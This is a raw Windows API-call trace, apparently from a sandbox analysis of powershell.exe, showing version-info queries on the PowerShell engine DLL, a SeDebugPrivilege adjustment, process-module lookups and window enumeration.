	[0295.625] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0295.625] GetVersionExW (in: lpVersionInformation=0x14d9f0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x14d9f0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0295.626] SetErrorMode (uMode=0x1) returned 0x1
	[0295.627] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x14db50 | out: lpFileInformation=0x14db50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0295.628] SetErrorMode (uMode=0x1) returned 0x1
	[0295.631] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x14ddc0 | out: lpdwHandle=0x14ddc0) returned 0x94c
	[0295.633] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2c272d8 | out: lpData=0x2c272d8) returned 1
	[0295.635] VerQueryValueW (in: pBlock=0x2c272d8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x14dd38, puLen=0x14dd30 | out: lplpBuffer=0x14dd38*=0x2c27374, puLen=0x14dd30) returned 1
	[0295.638] lstrlenW (lpString="䅁") returned 1
	[0295.647] VerQueryValueW (in: pBlock=0x2c272d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x14dca8, puLen=0x14dca0 | out: lplpBuffer=0x14dca8*=0x2c27450, puLen=0x14dca0) returned 1
	[0295.648] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0295.650] CoTaskMemAlloc (cb=0x2e) returned 0x293480
	[0295.650] lstrcpyW (in: lpString1=0x293480, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0295.651] CoTaskMemFree (pv=0x293480) 
	[0295.651] VerQueryValueW (in: pBlock=0x2c272d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x14dca8, puLen=0x14dca0 | out: lplpBuffer=0x14dca8*=0x2c274a4, puLen=0x14dca0) returned 1
	[0295.651] lstrlenW (lpString="System.Management.Automation") returned 28
	[0295.651] CoTaskMemAlloc (cb=0x3c) returned 0x218ee0
	[0295.651] lstrcpyW (in: lpString1=0x218ee0, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0295.651] CoTaskMemFree (pv=0x218ee0) 
	[0295.651] VerQueryValueW (in: pBlock=0x2c272d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x14dca8, puLen=0x14dca0 | out: lplpBuffer=0x14dca8*=0x2c27500, puLen=0x14dca0) returned 1
	[0295.652] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0295.652] CoTaskMemAlloc (cb=0x20) returned 0x291630
	[0295.652] lstrcpyW (in: lpString1=0x291630, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0295.652] CoTaskMemFree (pv=0x291630) 
	[0295.652] VerQueryValueW (in: pBlock=0x2c272d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x14dca8, puLen=0x14dca0 | out: lplpBuffer=0x14dca8*=0x2c27540, puLen=0x14dca0) returned 1
	[0295.652] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0295.652] CoTaskMemAlloc (cb=0x44) returned 0x218ee0
	[0295.652] lstrcpyW (in: lpString1=0x218ee0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0295.652] CoTaskMemFree (pv=0x218ee0) 
	[0295.652] VerQueryValueW (in: pBlock=0x2c272d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x14dca8, puLen=0x14dca0 | out: lplpBuffer=0x14dca8*=0x2c275a8, puLen=0x14dca0) returned 1
	[0295.652] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0295.652] CoTaskMemAlloc (cb=0x76) returned 0x2498c0
	[0295.652] lstrcpyW (in: lpString1=0x2498c0, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0295.652] CoTaskMemFree (pv=0x2498c0) 
	[0295.652] VerQueryValueW (in: pBlock=0x2c272d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x14dca8, puLen=0x14dca0 | out: lplpBuffer=0x14dca8*=0x2c27644, puLen=0x14dca0) returned 1
	[0295.652] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0295.652] CoTaskMemAlloc (cb=0x44) returned 0x218ee0
	[0295.652] lstrcpyW (in: lpString1=0x218ee0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0295.652] CoTaskMemFree (pv=0x218ee0) 
	[0295.653] VerQueryValueW (in: pBlock=0x2c272d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x14dca8, puLen=0x14dca0 | out: lplpBuffer=0x14dca8*=0x2c276a8, puLen=0x14dca0) returned 1
	[0295.653] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0295.653] CoTaskMemAlloc (cb=0x58) returned 0x2611d0
	[0295.653] lstrcpyW (in: lpString1=0x2611d0, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0295.653] CoTaskMemFree (pv=0x2611d0) 
	[0295.653] VerQueryValueW (in: pBlock=0x2c272d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x14dca8, puLen=0x14dca0 | out: lplpBuffer=0x14dca8*=0x2c27724, puLen=0x14dca0) returned 1
	[0295.653] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0295.653] CoTaskMemAlloc (cb=0x20) returned 0x291630
	[0295.653] lstrcpyW (in: lpString1=0x291630, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0295.653] CoTaskMemFree (pv=0x291630) 
	[0295.653] VerQueryValueW (in: pBlock=0x2c272d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x14dca8, puLen=0x14dca0 | out: lplpBuffer=0x14dca8*=0x2c273cc, puLen=0x14dca0) returned 1
	[0295.653] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0295.653] CoTaskMemAlloc (cb=0x66) returned 0x28fec0
	[0295.653] lstrcpyW (in: lpString1=0x28fec0, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0295.653] CoTaskMemFree (pv=0x28fec0) 
	[0295.653] VerQueryValueW (in: pBlock=0x2c272d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x14dca8, puLen=0x14dca0 | out: lplpBuffer=0x14dca8*=0x0, puLen=0x14dca0) returned 0
	[0295.653] VerQueryValueW (in: pBlock=0x2c272d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x14dca8, puLen=0x14dca0 | out: lplpBuffer=0x14dca8*=0x0, puLen=0x14dca0) returned 0
	[0295.653] VerQueryValueW (in: pBlock=0x2c272d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x14dca8, puLen=0x14dca0 | out: lplpBuffer=0x14dca8*=0x0, puLen=0x14dca0) returned 0
	[0295.654] VerQueryValueW (in: pBlock=0x2c272d8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x14dc78, puLen=0x14dc70 | out: lplpBuffer=0x14dc78*=0x2c27374, puLen=0x14dc70) returned 1
	[0296.404] CoTaskMemAlloc (cb=0x204) returned 0x245c80
	[0296.404] VerLanguageNameW (in: wLang=0x0, szLang=0x245c80, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0296.405] CoTaskMemFree (pv=0x245c80) 
	[0296.406] VerQueryValueW (in: pBlock=0x2c272d8, lpSubBlock="\\", lplpBuffer=0x14dcc8, puLen=0x14dcc0 | out: lplpBuffer=0x14dcc8*=0x2c27300, puLen=0x14dcc0) returned 1
	[0296.412] GetCurrentProcessId () returned 0x890
	[0296.428] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x14cbf0 | out: lpLuid=0x14cbf0*(LowPart=0x14, HighPart=0)) returned 1
	[0296.431] GetCurrentProcess () returned 0xffffffffffffffff
	[0296.432] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x20, TokenHandle=0x14cc10 | out: TokenHandle=0x14cc10*=0x2ec) returned 1
	[0296.433] AdjustTokenPrivileges (in: TokenHandle=0x2ec, DisableAllPrivileges=0, NewState=0x2c2ab50*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
	[0296.434] CloseHandle (hObject=0x2ec) returned 1
	[0296.438] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x890) returned 0x2ec
	[0296.446] EnumProcessModules (in: hProcess=0x2ec, lphModule=0x2c2abb8, cb=0x200, lpcbNeeded=0x14dc28 | out: lphModule=0x2c2abb8, lpcbNeeded=0x14dc28) returned 1
	[0296.449] GetModuleInformation (in: hProcess=0x2ec, hModule=0x13f370000, lpmodinfo=0x2c2ae28, cb=0x18 | out: lpmodinfo=0x2c2ae28*(lpBaseOfDll=0x13f370000, SizeOfImage=0x77000, EntryPoint=0x13f37c63c)) returned 1
	[0297.121] CoTaskMemAlloc (cb=0x804) returned 0x29a500
	[0297.121] GetModuleBaseNameW (in: hProcess=0x2ec, hModule=0x13f370000, lpBaseName=0x29a500, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe
	[0297.121] CoTaskMemFree (pv=0x29a500) 
	[0297.122] CoTaskMemAlloc (cb=0x804) returned 0x29a500
	[0297.122] GetModuleFileNameExW (in: hProcess=0x2ec, hModule=0x13f370000, lpFilename=0x29a500, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0297.122] CoTaskMemFree (pv=0x29a500) 
	[0297.123] CloseHandle (hObject=0x2ec) returned 1
	[0297.130] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x890) returned 0x2ec
	[0297.131] GetExitCodeProcess (in: hProcess=0x2ec, lpExitCode=0x14dd58 | out: lpExitCode=0x14dd58*=0x103) returned 1
	[0297.135] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12c2b088, Length=0x20000, ResultLength=0x14dd20 | out: SystemInformation=0x12c2b088, ResultLength=0x14dd20*=0x15800) returned 0x0
	[0297.147] EnumWindows (lpEnumFunc=0x27e66ac, lParam=0x0) returned 1
	[0297.148] GetWindowThreadProcessId (in: hWnd=0x10090, lpdwProcessId=0x14da80 | out: lpdwProcessId=0x14da80) returned 0x4d0
	[0297.148] GetWindowThreadProcessId (in: hWnd=0x3013e, lpdwProcessId=0x14da80 | out: lpdwProcessId=0x14da80) returned 0x558
	[0297.148] GetWindowThreadProcessId (in: hWnd=0x201ba, lpdwProcessId=0x14da80 | out: lpdwProcessId=0x14da80) returned 0x4d0
	[0297.148] GetWindowThreadProcessId (in: hWnd=0x300fe, lpdwProcessId=0x14da80 | out: lpdwProcessId=0x14da80) returned 0x4d0
	[0297.148] GetWindowThreadProcessId (in: hWnd=0x400ae, lpdwProcessId=0x14da80 | out: lpdwProcessId=0x14da80) returned 0x4d0
	[0297.149] GetWindowThreadProcessId (in: hWnd=0x10146, lpdwProcessId=0x14da80 | out: lpdwProcessId=0x14da80) returned 0x538
	[0297.149] GetWindowThreadProcessId (in: hWnd=0x20118, lpdwProcessId=0x14da80 | out: lpdwProcessId=0x14da80) returned 0x4d0
	[0297.149] GetWindowThreadProcessId (in: hWnd=0x2001e, lpdwProcessId=0x14da80 | out: lpdwProcessId=0x14da80) returned 0x778
	[0297.149] GetWindowThreadProcessId (in: hWnd=0x20028, lpdwProcessId=0x14da80 | out: lpdwProcessId=0x14da80) returned 0x778
	[0297.149] GetWindowThreadProcessId (in: hWnd=0x1007c, lpdwProcessId=0x14da80 | out: lpdwProcessId=0x14da80) returned 0x4d0
	[0297.149] GetWindowThreadProcessId (in: hWnd=0x1007a, lpdwProcessId=0x14da80 | out: lpdwProcessId=0x14da80) returned 0x4d0
	[0297.149] GetWindowThreadProcessId (in: hWnd=0x10066, lpdwProcessId=0x14da80 | out: lpdwProcessId=0x14da80) returned 0x4d0
	[0297.149] GetWindowThreadProcessId (in: hWnd=0x10084, lpdwProcessId=0x14da80 | out: lpdwProcessId=0x14da80) returned 0x4d0
	[0297.150] GetWindowThreadProcessId (in: hWnd=0x10082, lpdwProcessId=0x14da80 | out: lpdwProcessId=0x14da80) returned 0x4d0
	[0297.150] GetWindowThreadProcessId (in: hWnd=0x1007e, lpdwProcessId=0x14da80 | out: lpdwProcessId=0x14da80) returned 0x4d0
	[0297.150] GetWindowThreadProcessId (in: hWnd=0x1005e, lpdwProcessId=0x14da80 | out: lpdwProcessId=0x14da80) returned 0x4d0
	[0297.150] GetWindowThreadProcessId (in: hWnd=0x10056, lpdwProcessId=0x14da80 | out: lpdwProcessId=0x14da80) returned 0x4d0
	[0297.150] GetWindowThreadProcessId (in: hWnd=0x100fa, lpdwProcessId=0x14da80 | out: lpdwProcessId=0x14da80) returned 0x460
	[0297.150] GetWindowThreadProcessId (in: hWnd=0x500a2, lpdwProcessId=0x14da80 | out: lpdwProcessId=0x14da80) returned 0x4d0
	[0297.150] GetWindowThreadProcessId (in: hWnd=0x10092, lpdwProcessId=0x14da80 | out: lpdwProcessId=0x14da80) returned 0x4d0
	[0297.150] GetWindowThreadProcessId (in: hWnd=0x10344, lpdwProcessId=0x14da80 | out: lpdwProcessId=0x14da80) returned 0xc24
	[0297.150] GetWindowThreadProcessId (in: hWnd=0x1032a, lpdwProcessId=0x14da80 | out: lpdwProcessId=0x14da80) returned 0xb84
	[0297.151] GetWindowThreadProcessId (in: hWnd=0x10316, lpdwProcessId=0x14da80 | out: lpdwProcessId=0x14da80) returned 0xbac
	[0297.151] GetWindowThreadProcessId (in: hWnd=0x102f8, lpdwProcessId=0x14da80 | out: lpdwProcessId=0x14da80) returned 0x384
	[0297.151] GetWindowThreadProcessId (in: hWnd=0x102de, lpdwProcessId=0x14da80 | out: lpdwProcessId=0x14da80) returned 0xab8
	[0297.151] GetWindowThreadProcessId (in: hWnd=0x102da, lpdwProcessId=0x14da80 | out: lpdwProcessId=0x14da80) returned 0x33c
	[0297.151] GetWindowThreadProcessId (in: hWnd=0x102d0, lpdwProcessId=0x14da80 | out: lpdwProcessId=0x14da80) returned 0xa44
	[0297.151] GetWindowThreadProcessId (in: hWnd=0x102cc, lpdwProcessId=0x14da80 | out: lpdwProcessId=0x14da80) returned 0xa64
	[0297.151] GetWindowThreadProcessId (in: hWnd=0x102c8, lpdwProcessId=0x14da80 | out: lpdwProcessId=0x14da80) returned 0x8a8
	[0297.151] GetWindowThreadProcessId (in: hWnd=0x102c4, lpdwProcessId=0x14da80 | out: lpdwProcessId=0x14da80) returned 0xaf0
	[0297.151] GetWindowThreadProcessId (in: hWnd=0x102c0, lpdwProcessId=0x14da80 | out: lpdwProcessId=0x14da80) returned 0x88c
	[0297.152] GetWindowThreadProcessId (in: hWnd=0x102bc, lpdwProcessId=0x14da80 | out: lpdwProcessId=0x14da80) returned 0xb04
	[0297.152] GetWindowThreadProcessId (in: hWnd=0x102b0, lpdwProcessId=0x14da80 | out: lpdwProcessId=0x14da80) returned 0x910
	[0297.152] GetWindowThreadProcessId (in: hWnd=0x102ac, lpdwProcessId=0x14da80 | out: lpdwProcessId=0x14da80) returned 0x230
	[0297.152] GetWindowThreadProcessId (in: hWnd=0x30298, lpdwProcessId=0x14da80 | out: lpdwProcessId=0x14da80) returned 0xac0
	[0297.152] GetWindowThreadProcessId (in: hWnd=0x2029a, lpdwProcessId=0x14da80 | out: lpdwProcessId=0x14da80) returned 0xab4
	[0297.152] GetWindowThreadProcessId (in: hWnd=0x10262, lpdwProcessId=0x14da80 | out: lpdwProcessId=0x14da80) returned 0xaac
	[0297.152] GetWindowThreadProcessId (in: hWnd=0x10252, lpdwProcessId=0x14da80 | out: lpdwProcessId=0x14da80) returned 0x3d0
	[0297.152] GetWindowThreadProcessId (in: hWnd=0x10242, lpdwProcessId=0x14da80 | out: lpdwProcessId=0x14da80) returned 0x978
	[0297.152] GetWindowThreadProcessId (in: hWnd=0x10228, lpdwProcessId=0x14da80 | out: lpdwProcessId=0x14da80) returned 0xa7c
	[0297.153] GetWindowThreadProcessId (in: hWnd=0x10224, lpdwProcessId=0x14da80 | out: lpdwProcessId=0x14da80) returned 0x59c
	[0297.153] GetWindowThreadProcessId (in: hWnd=0x20212, lpdwProcessId=0x14da80 | out: lpdwProcessId=0x14da80) returned 0xa88
	[0297.153] GetWindowThreadProcessId (in: hWnd=0x1021c, lpdwProcessId=0x14da80 | out: lpdwProcessId=0x14da80) returned 0xa6c
	[0297.154] GetWindow (hWnd=0x1021c, uCmd=0x4) returned 0x0
	[0297.154] IsWindowVisible (hWnd=0x1021c) returned 0
	[0297.154] GetWindowThreadProcessId (in: hWnd=0x10214, lpdwProcessId=0x14da80 | out: lpdwProcessId=0x14da80) returned 0xa68
	[0297.155] GetWindowThreadProcessId (in: hWnd=0x20206, lpdwProcessId=0x14da80 | out: lpdwProcessId=0x14da80) returned 0x9f8
	[0297.155] GetWindowThreadProcessId (in: hWnd=0x20204, lpdwProcessId=0x14da80 | out: lpdwProcessId=0x14da80) returned 0xa04
	[0297.155] GetWindowThreadProcessId (in: hWnd=0x1020a, lpdwProcessId=0x14da80 | out: lpdwProcessId=0x14da80) returned 0x924
	[0297.155] GetWindowThreadProcessId (in: hWnd=0x10200, lpdwProcessId=0x14da80 | out: lpdwProcessId=0x14da80) returned 0x8dc
	[0297.155] GetWindowThreadProcessId (in: hWnd=0x201ec, lpdwProcessId=0x14da80 | out: lpdwProcessId=0x14da80) returned 0x7dc
	[0297.155] GetWindowThreadProcessId (in: hWnd=0x301d6, lpdwProcessId=0x14da80 | out: lpdwProcessId=0x14da80) returned 0x768
	[0297.155] GetWindowThreadProcessId (in: hWnd=0x301e0, lpdwProcessId=0x14da80 | out: lpdwProcessId=0x14da80) returned 0x764
	[0297.155] GetWindowThreadProcessId (in: hWnd=0x201e4, lpdwProcessId=0x14da80 | out: lpdwProcessId=0x14da80) returned 0x820
	[0297.155] GetWindowThreadProcessId (in: hWnd=0x201c6, lpdwProcessId=0x14da80 | out: lpdwProcessId=0x14da80) returned 0x810
	[0297.156] GetWindowThreadProcessId (in: hWnd=0x301f2, lpdwProcessId=0x14da80 | out: lpdwProcessId=0x14da80) returned 0x794
	[0297.156] GetWindowThreadProcessId (in: hWnd=0x401b6, lpdwProcessId=0x14da80 | out: lpdwProcessId=0x14da80) returned 0x83c
	[0297.156] GetWindowThreadProcessId (in: hWnd=0x501be, lpdwProcessId=0x14da80 | out: lpdwProcessId=0x14da80) returned 0x7ac
	[0297.156] GetWindowThreadProcessId (in: hWnd=0x160162, lpdwProcessId=0x14da80 | out: lpdwProcessId=0x14da80) returned 0xb44
	[0297.156] GetWindowThreadProcessId (in: hWnd=0x500ea, lpdwProcessId=0x14da80 | out: lpdwProcessId=0x14da80) returned 0xb5c
	[0297.156] GetWindowThreadProcessId (in: hWnd=0x101b0, lpdwProcessId=0x14da80 | out: lpdwProcessId=0x14da80) returned 0x838
	[0297.156] GetWindowThreadProcessId (in: hWnd=0x800a8, lpdwProcessId=0x14da80 | out: lpdwProcessId=0x14da80) returned 0x4d0
	[0297.156] GetWindowThreadProcessId (in: hWnd=0x400b0, lpdwProcessId=0x14da80 | out: lpdwProcessId=0x14da80) returned 0x4d0
	[0297.156] GetWindowThreadProcessId (in: hWnd=0x300c6, lpdwProcessId=0x14da80 | out: lpdwProcessId=0x14da80) returned 0x4d0
	[0297.157] GetWindowThreadProcessId (in: hWnd=0x300d2, lpdwProcessId=0x14da80 | out: lpdwProcessId=0x14da80) returned 0x4d0
	[0297.157] GetWindowThreadProcessId (in: hWnd=0x300ce, lpdwProcessId=0x14da80 | out: lpdwProcessId=0x14da80) returned 0x4d0
	[0297.157] GetWindowThreadProcessId (in: hWnd=0x300d8, lpdwProcessId=0x14da80 | out: lpdwProcessId=0x14da80) returned 0x4d0
	[0297.157] GetWindowThreadProcessId (in: hWnd=0x400b8, lpdwProcessId=0x14da80 | out: lpdwProcessId=0x14da80) returned 0x4d0
	[0297.157] GetWindowThreadProcessId (in: hWnd=0x300ac, lpdwProcessId=0x14da80 | out: lpdwProcessId=0x14da80) returned 0x4d0
	[0297.157] GetWindowThreadProcessId (in: hWnd=0x101ac, lpdwProcessId=0x14da80 | out: lpdwProcessId=0x14da80) returned 0x818
	[0297.157] GetWindowThreadProcessId (in: hWnd=0x101a8, lpdwProcessId=0x14da80 | out: lpdwProcessId=0x14da80) returned 0x5b8
	[0297.157] GetWindowThreadProcessId (in: hWnd=0x101a4, lpdwProcessId=0x14da80 | out: lpdwProcessId=0x14da80) returned 0x494
	[0297.157] GetWindowThreadProcessId (in: hWnd=0x101a0, lpdwProcessId=0x14da80 | out: lpdwProcessId=0x14da80) returned 0x1ec
	[0297.157] GetWindowThreadProcessId (in: hWnd=0x1019c, lpdwProcessId=0x14da80 | out: lpdwProcessId=0x14da80) returned 0x440
	[0297.158] GetWindowThreadProcessId (in: hWnd=0x10198, lpdwProcessId=0x14da80 | out: lpdwProcessId=0x14da80) returned 0x7e8
	[0297.158] GetWindowThreadProcessId (in: hWnd=0x10194, lpdwProcessId=0x14da80 | out: lpdwProcessId=0x14da80) returned 0x730
	[0297.158] GetWindowThreadProcessId (in: hWnd=0x10190, lpdwProcessId=0x14da80 | out: lpdwProcessId=0x14da80) returned 0x2c8
	[0297.158] GetWindowThreadProcessId (in: hWnd=0x1018c, lpdwProcessId=0x14da80 | out: lpdwProcessId=0x14da80) returned 0x31c
	[0297.158] GetWindowThreadProcessId (in: hWnd=0x10188, lpdwProcessId=0x14da80 | out: lpdwProcessId=0x14da80) returned 0x330
	[0297.158] GetWindowThreadProcessId (in: hWnd=0x10184, lpdwProcessId=0x14da80 | out: lpdwProcessId=0x14da80) returned 0x128
	[0297.158] GetWindowThreadProcessId (in: hWnd=0x10180, lpdwProcessId=0x14da80 | out: lpdwProcessId=0x14da80) returned 0x5c8
	[0297.158] GetWindowThreadProcessId (in: hWnd=0x1017c, lpdwProcessId=0x14da80 | out: lpdwProcessId=0x14da80) returned 0x6f8
	[0297.158] GetWindowThreadProcessId (in: hWnd=0x10178, lpdwProcessId=0x14da80 | out: lpdwProcessId=0x14da80) returned 0x358
	[0297.158] GetWindowThreadProcessId (in: hWnd=0x10174, lpdwProcessId=0x14da80 | out: lpdwProcessId=0x14da80) returned 0x73c
	[0297.159] GetWindowThreadProcessId (in: hWnd=0x10170, lpdwProcessId=0x14da80 | out: lpdwProcessId=0x14da80) returned 0xb0
	[0297.159] GetWindowThreadProcessId (in: hWnd=0x1016c, lpdwProcessId=0x14da80 | out: lpdwProcessId=0x14da80) returned 0x250
	[0297.159] GetWindowThreadProcessId (in: hWnd=0x10168, lpdwProcessId=0x14da80 | out: lpdwProcessId=0x14da80) returned 0x240
	[0297.159] GetWindowThreadProcessId (in: hWnd=0x2015e, lpdwProcessId=0x14da80 | out: lpdwProcessId=0x14da80) returned 0x790
	[0297.159] GetWindowThreadProcessId (in: hWnd=0x40112, lpdwProcessId=0x14da80 | out: lpdwProcessId=0x14da80) returned 0x61c
	[0297.159] GetWindowThreadProcessId (in: hWnd=0x3015a, lpdwProcessId=0x14da80 | out: lpdwProcessId=0x14da80) returned 0x540
	[0297.159] GetWindowThreadProcessId (in: hWnd=0x10150, lpdwProcessId=0x14da80 | out: lpdwProcessId=0x14da80) returned 0x538
	[0297.159] GetWindowThreadProcessId (in: hWnd=0x1014e, lpdwProcessId=0x14da80 | out: lpdwProcessId=0x14da80) returned 0x568
	[0297.159] GetWindowThreadProcessId (in: hWnd=0x20144, lpdwProcessId=0x14da80 | out: lpdwProcessId=0x14da80) returned 0x538
	[0297.160] GetWindowThreadProcessId (in: hWnd=0x10138, lpdwProcessId=0x14da80 | out: lpdwProcessId=0x14da80) returned 0x568
	[0297.160] GetWindowThreadProcessId (in: hWnd=0x10130, lpdwProcessId=0x14da80 | out: lpdwProcessId=0x14da80) returned 0x538
	[0297.160] GetWindowThreadProcessId (in: hWnd=0x10126, lpdwProcessId=0x14da80 | out: lpdwProcessId=0x14da80) returned 0x540
	[0297.160] GetWindowThreadProcessId (in: hWnd=0x200d6, lpdwProcessId=0x14da80 | out: lpdwProcessId=0x14da80) returned 0x540
	[0297.160] GetWindowThreadProcessId (in: hWnd=0x1010e, lpdwProcessId=0x14da80 | out: lpdwProcessId=0x14da80) returned 0x510
	[0297.160] GetWindowThreadProcessId (in: hWnd=0x1010c, lpdwProcessId=0x14da80 | out: lpdwProcessId=0x14da80) returned 0x57c
	[0297.160] GetWindowThreadProcessId (in: hWnd=0x10108, lpdwProcessId=0x14da80 | out: lpdwProcessId=0x14da80) returned 0x460
	[0297.160] GetWindowThreadProcessId (in: hWnd=0x10102, lpdwProcessId=0x14da80 | out: lpdwProcessId=0x14da80) returned 0x554
	[0297.160] GetWindowThreadProcessId (in: hWnd=0x50094, lpdwProcessId=0x14da80 | out: lpdwProcessId=0x14da80) returned 0x4d0
	[0297.160] GetWindowThreadProcessId (in: hWnd=0x1008a, lpdwProcessId=0x14da80 | out: lpdwProcessId=0x14da80) returned 0x528
	[0297.161] GetWindowThreadProcessId (in: hWnd=0x10088, lpdwProcessId=0x14da80 | out: lpdwProcessId=0x14da80) returned 0x4d0
	[0297.161] GetWindowThreadProcessId (in: hWnd=0x10080, lpdwProcessId=0x14da80 | out: lpdwProcessId=0x14da80) returned 0x4d0
	[0297.161] GetWindowThreadProcessId (in: hWnd=0x1006e, lpdwProcessId=0x14da80 | out: lpdwProcessId=0x14da80) returned 0x4d0
	[0297.161] GetWindowThreadProcessId (in: hWnd=0x20020, lpdwProcessId=0x14da80 | out: lpdwProcessId=0x14da80) returned 0x79c
	[0297.161] GetWindowThreadProcessId (in: hWnd=0x1006a, lpdwProcessId=0x14da80 | out: lpdwProcessId=0x14da80) returned 0x4d0
	[0297.161] GetWindowThreadProcessId (in: hWnd=0x10058, lpdwProcessId=0x14da80 | out: lpdwProcessId=0x14da80) returned 0x4e0
	[0297.161] GetWindowThreadProcessId (in: hWnd=0x10052, lpdwProcessId=0x14da80 | out: lpdwProcessId=0x14da80) returned 0x4d0
	[0297.161] GetWindowThreadProcessId (in: hWnd=0x1004a, lpdwProcessId=0x14da80 | out: lpdwProcessId=0x14da80) returned 0x460
	[0297.161] GetWindowThreadProcessId (in: hWnd=0x20046, lpdwProcessId=0x14da80 | out: lpdwProcessId=0x14da80) returned 0x460
	[0297.162] GetWindowThreadProcessId (in: hWnd=0x30044, lpdwProcessId=0x14da80 | out: lpdwProcessId=0x14da80) returned 0x44c
	[0297.162] GetWindowThreadProcessId (in: hWnd=0x20018, lpdwProcessId=0x14da80 | out: lpdwProcessId=0x14da80) returned 0x778
	[0297.162] GetWindowThreadProcessId (in: hWnd=0x100f2, lpdwProcessId=0x14da80 | out: lpdwProcessId=0x14da80) returned 0x460
	[0297.162] GetWindowThreadProcessId (in: hWnd=0x30140, lpdwProcessId=0x14da80 | out: lpdwProcessId=0x14da80) returned 0x558
